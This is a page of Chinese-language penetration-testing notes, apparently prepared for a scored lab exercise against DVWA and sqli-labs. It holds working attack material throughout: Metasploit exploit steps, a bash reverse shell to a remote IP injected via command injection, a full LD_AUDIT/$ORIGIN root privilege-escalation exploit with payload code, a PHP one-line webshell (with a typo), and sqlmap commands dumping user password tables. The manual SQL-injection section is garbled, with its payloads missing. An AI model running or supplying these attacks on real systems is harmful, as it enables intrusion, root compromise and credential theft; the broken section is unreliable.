astartx进入图形界面
端口扫描:
nmap 192.168.1.10 #扫描同一段的ip
nmap 192.168.1.0/24 #扫描整个段
nmap -sT 192.168.1.118 #-sT来实现tcp连接扫描
nmap -sU 192.168.1.119 #-sU来实现udp扫描
nmap -sN 22,25,80,3306 192.168.1.118 #扫描指定端口
nmap 192.168.1.118 -oX hh.xml #扫描结果导出到hh.xml
抓包:
tcpdump –nnX tcp and host 192.168.1.119 #这里的ip为攻击机
数据抓取监控
wireshark
转换格式:
xsltproc hh.xml -o hh.html
漏洞扫描:
firefox https://localhost:8834
msfconsole 攻击:
漏洞代码:MS04_007
search ms04_007 #查看该漏洞使用的exploit模块
use exploit/windows/iis/ms01_026_dbldecode #使用模块
show options #查看设置参数
set RHOST 192.168.1.173 #设置RHOST(攻击目标)
SET LHOST 192.168.1.174 #设置LHOST(攻击机)
show options #查看需要设置哪些配置参数
exploit #漏洞利用,会看到ip 192.168.1.173反弹连接到了我们本地的4444端口
成功!
DVWA渗透:
nc -v-l-p 80 #监听本机80端口
;/bin/bash –i > /dev/tcp/172.16.1.52/80|0<&1 2>&1 #在注入漏洞模块提交
此时本机Kali中会反弹回来一个被攻击机的shell
id #查看用户属性
uname -a #查看系统版本号
通过提取文档进行复制粘贴提取
;/bin/bash –i > /dev/tcp/10.1.7.69/80|0<&1 2>&1
--------------------------------------------
提权exp详细解析:
# 在/tmp下创建可控制的目录
$ mkdir /tmp/exploit
# 链接到suid二进制程序以更改$ORIGIN的定义
$ ln /bin/ping /tmp/exploit/target
# 打开到目标二进制程序的文件描述符
$ exec 3< /tmp/exploit/target
# 现在可通过/proc访问描述符
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# 删除之前所创建的目录
$ rm -rf /tmp/exploit/
# /proc链接仍存在,但已标记为已被删除
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# 使用负载DSO替换目录,使$ORIGIN成为到dlopen()的有效目标
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
--------------------------------------------
当UID=0,即得root权限
建立一个一句话木马文件
echo "<?php @ecal(\$_POST[\"elab\"]); ?>" > /dvw/aa.php
菜刀进入
http://172.16.1.57/dvwa/aa.php
sqlmap:
该界面是通过输入用户id 查询用户信息,用户id 是小于20的id
1.找到sql注入点,通过 ' 字符验证有SQL注入漏洞(1分)
1''
http://blog.sina.com.cn/s/blog_5c92dd1f0102vjfg.html
2.查看页面源代码,找到页面"Submit"的名字和值,并截屏(2分)
右键加V 查找
3.通过浏览器及其插件得到cookie 值,并截屏(2分)
4.在xclient 用sqlmap 做注入攻击,获取后台的数据库信息,操作系统信息,以及web系统信息,并截
屏(2分)
5.在xclient 用sqlmap 做注入攻击,获取当前数据库名,并截屏(2分)
sqlmap -r /root/aaa.txt --dbs
./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”
1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”
2、-u : 指定目标URL
3、-b : 获取DBMS banner
4、–current-db : 获取当前数据库
5、–current-user:获取当前用户
#aaa.txt为cookie
6.在xclient 用sqlmap 做注入攻击,获取当前数据库的所有表,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa --tables
7.猜测当前的用户信息表名,在xclient 用sqlmap 做注入攻击,获取当前数据库的用户表的结构,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa -T users --columns
#-T : 要枚举的DBMS数据库表 –columns : 枚举 DBMS数据库表中的所有列
8.在xclient 用sqlmap 做注入攻击,获取当前数据库的用户表内容信息,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa -T users-C user,password --dump
- -T : 要枚举的DBMS数据表
- -C: 要枚举的DBMS数据表中的列
- –dump : 转储DBMS数据表项
用法:python sqlmap [options]
-
- 选项:
- -h,--help显示基本帮助消息并退出
- -hh显示高级帮助消息并退出
- --version显示程序的版本号并退出
- -v VERBOSE等级:0-6(默认值1)
-
- 目标:
- 必须提供这些选项中的至少一个来定义
- 目标
-
- -u URL,--url = URL目标URL(例如“http://www.site.com/vuln.php?id=1”)
- -g GOOGLEDORK将Google dork结果作为目标网址进行处理
-
- 请求:
- 这些选项可用于指定如何连接到目标URL
-
- --data = DATA通过POST发送的数据字符串
- --cookie = COOKIE HTTP Cookie头值
- --random-agent使用随机选择的HTTP User-Agent头值
- --proxy = PROXY使用代理连接到目标URL
- --tor使用Tor匿名网络
- - 检查Tor检查Tor是否正确使用
-
- 注射:
- 这些选项可用于指定要测试的参数,
- 提供自定义注入有效载荷和可选的篡改脚本
-
- -p TESTPARAMETER可测试参数
- --dbms = DBMS将后端DBMS强制为此值
-
- 检测:
- 这些选项可用于自定义检测阶段
-
- --level = LEVEL要执行的测试级别(1-5,默认为1)
- --risk =风险执行测试的风险(0-3,默认值1)
-
- 技术:
- 这些选项可用于调整特定SQL注入的测试
- 技术
-
- --technique = TECH SQL注入技术使用(默认为“BEUSTQ”)
-
- 枚举:
- 这些选项可用于枚举后端数据库
- 管理系统信息,结构和数据包含在
- 表。此外,您可以运行自己的SQL语句
-
- -a,--all检索所有内容
- -b,--banner检索DBMS横幅
- --current-user检索DBMS当前用户
- --current-db检索DBMS当前数据库
- --passwords枚举DBMS用户密码散列
- --tables枚举DBMS数据库表
- - 列列举DBMS数据库表列
- --schema枚举DBMS模式
- - 转储转储DBMS数据库表条目
- --dump-all转储所有DBMS数据库表条目
- -D DB DBMS数据库枚举
- -T TBL要列举的DBMS数据库表
- -C COL DBMS数据库表列列出
-
- 操作系统访问:
- 这些选项可用于访问后端数据库管理
- 系统底层操作系统
-
- --os-shell提示交互式操作系统shell
- --os-pwn提示OOB shell,Meterpreter或VNC
-
- 一般:
- 这些选项可用于设置一些一般工作参数
-
- --batch不要求用户输入,使用默认行为
- --flush-session刷新当前目标的会话文件
-
- 杂:
- --sqlmap-shell提示交互式sqlmap shell
- --wizard初学者用户的简单向导界面
-
- [!]以“-hh”运行的完整选项列表
- root @ kali:〜#
sql手动注入:
http://localhost/sqlilabs/Less-2/?id=1id
是一个注入点后台的SQL语句的写法大致为
那么我们通过使用
order by
的语句来判断select
所查询字段的数目。# SELECT 语句用于从表中选取数据。那么payload变为:
当使用
order by 4
时程序出错,那么select
的字段一共是3个。得到显示位
在页面上会显示从select
中选取的字段,我们接下来就是要判断显示的字段是哪几个字段。
使用如下的payload(两者均可)进行判断。
当使用个如上的payload时,页面的显示如下:
通过如上的页面显示就可以知道,页面中显示的是第2位和第3位的信息。
查选库
在知道了显示位之后,那么接下来就可以通过显示位来显示我们想知道的信息,如数据库的版本,用户信息等等。那么我们使用如下的payload就可以知道相关的信息。
此时页面的显示为:
评论